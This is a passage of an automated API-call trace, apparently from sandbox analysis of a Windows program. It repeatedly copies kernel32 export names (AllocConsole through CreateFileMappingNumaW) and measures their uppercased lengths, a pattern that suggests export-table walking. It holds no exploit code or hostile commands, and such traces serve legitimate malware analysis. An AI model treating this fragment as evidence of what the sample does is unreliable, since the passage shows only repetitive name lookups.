lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.609] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.609] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.609] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.609] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.609] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.609] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.609] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.609] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.609] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.609] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.609] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.609] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.609] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.609] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.609] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.610] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.610] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.610] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.610] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.610] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.610] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.610] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.610] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.610] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.610] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.610] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.610] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.610] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.610] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.610] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.610] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.610] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.610] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.611] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.611] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.611] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.611] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.611] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.611] lstrlenA (lpString="BEEP") returned 4 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.611] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.611] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.611] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.611] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.611] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.611] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.611] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.611] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.611] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.611] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.611] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.611] lstrlenA (lpString="CANCELIO") returned 8 [0080.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.612] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.612] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.612] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.612] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.612] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.612] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.612] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.612] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.612] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.612] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.612] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.612] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.612] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.612] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.612] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.612] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.612] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.612] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.613] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.613] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.613] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.613] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.613] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.613] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.613] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.613] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.613] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.613] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.613] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.613] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.613] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.613] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.613] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.613] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.613] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.613] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.613] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.614] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.614] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.614] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.614] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.614] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.614] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.614] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.614] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.614] lstrlenA (lpString="COPYFILEA") returned 9 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.614] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.614] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.614] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.614] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.614] lstrlenA (lpString="COPYFILEW") returned 9 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.614] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.614] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.614] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.614] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.615] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.615] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.615] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.615] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.615] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.615] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.615] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.615] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.615] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.615] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.615] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.615] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.615] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.615] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.615] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.615] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.615] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") 